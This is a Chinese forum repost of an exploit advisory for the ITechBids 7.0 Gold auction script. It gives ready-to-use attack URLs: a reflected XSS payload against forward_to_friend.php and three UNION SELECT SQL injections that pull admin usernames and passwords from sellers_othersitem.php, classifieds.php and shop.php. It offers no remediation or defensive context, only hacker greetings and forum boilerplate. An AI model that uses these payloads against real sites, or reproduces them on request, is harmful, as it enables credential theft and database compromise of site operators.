• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

    发布者: 网神之王 | 发布时间: 2025-6-28 22:50| 查看数: 82| 评论数: 0|帖子模式

    ######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
    ##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
    ##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
    ######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
    ##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
    ##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
    ######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########

    ################################ !R4Q!4N H4CK3R  ###################################

    ITechBids 7.0 Gold Multiple Remote Vulnerabilities

    Website : http://www.itechscripts.com

    Founded By : Encrypt3d.M!nd

    NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


    # 1- Cross-site scripting (XSS):

    Affected File : forward_to_friend.php

    PoC :

    /forward_to_friend.php?productid=<script>alert(666);</script>


    # 2-Remote Sql Injection(s) :

    Affected File(s) :

    sellers_othersitem.php
    classifieds.php
    shop.php

    Note:There is Other Files Affected But I Couldn't Exploit Them

    PoC:

    /sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

    /classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

    /shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin


    # Greetz:

    MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
    KoRn The Dog,Mini-Spider,All My Friends


    The EnD

    来源:https://www.jb51.net/hack/5692.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表